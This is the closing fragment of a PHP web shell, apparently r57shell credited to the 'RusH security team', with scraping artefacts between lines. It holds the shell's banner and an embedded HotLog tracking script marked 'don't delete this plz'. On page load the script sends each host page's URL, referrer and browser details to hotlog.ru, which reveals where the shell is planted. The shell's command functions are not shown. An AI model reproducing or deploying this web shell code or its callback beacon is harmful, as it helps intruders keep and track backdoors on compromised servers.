|
<?
|
|||
|
echo "<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RusH security team | <a href=http://rst.void.ru>http://rst.void.ru</a> | version 1.0 beta ]---o</b></font></div>";
|
|||
|
?>
|
|||
|
</td></tr></table>
|
|||
|
|
|||
|
<!-- don't delete this plz -->
|
|||
|
<script language="javascript">
|
|||
|
hotlog_js="1.0";
|
|||
|
hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+
|
|||
|
escape(window.location.href);
|
|||
|
document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");
|
|||
|
</script><script language="javascript1.1">
|
|||
|
hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script>
|
|||
|
<script language="javascript1.2">
|
|||
|
hotlog_js="1.2";
|
|||
|
hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+
|
|||
|
(((navigator.appName.substring(0,3)=="Mic"))?
|
|||
|
screen.colorDepth:screen.pixelDepth)</script>
|
|||
|
<script language="javascript1.3">hotlog_js="1.3"</script>
|
|||
|
<script language="javascript">hotlog_r+="&js="+hotlog_js;
|
|||
|
document.write("<a href='http://click.hotlog.ru/?81606' target='_top'><img "+
|
|||
|
" src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+
|
|||
|
hotlog_r+"&' border=0 width=1 height=1 alt=1></a>")</script>
|
|||
|
<noscript><a href=http://click.hotlog.ru/?81606 target=_top><img
|
|||
|
src="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" border=0
|
|||
|
width="1" height="1" alt="HotLog"></a></noscript>
|
|||
|
<!-- /don't delete this plz -->
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<? /* -------------------------[ EOF ]------------------------- */ ?>
|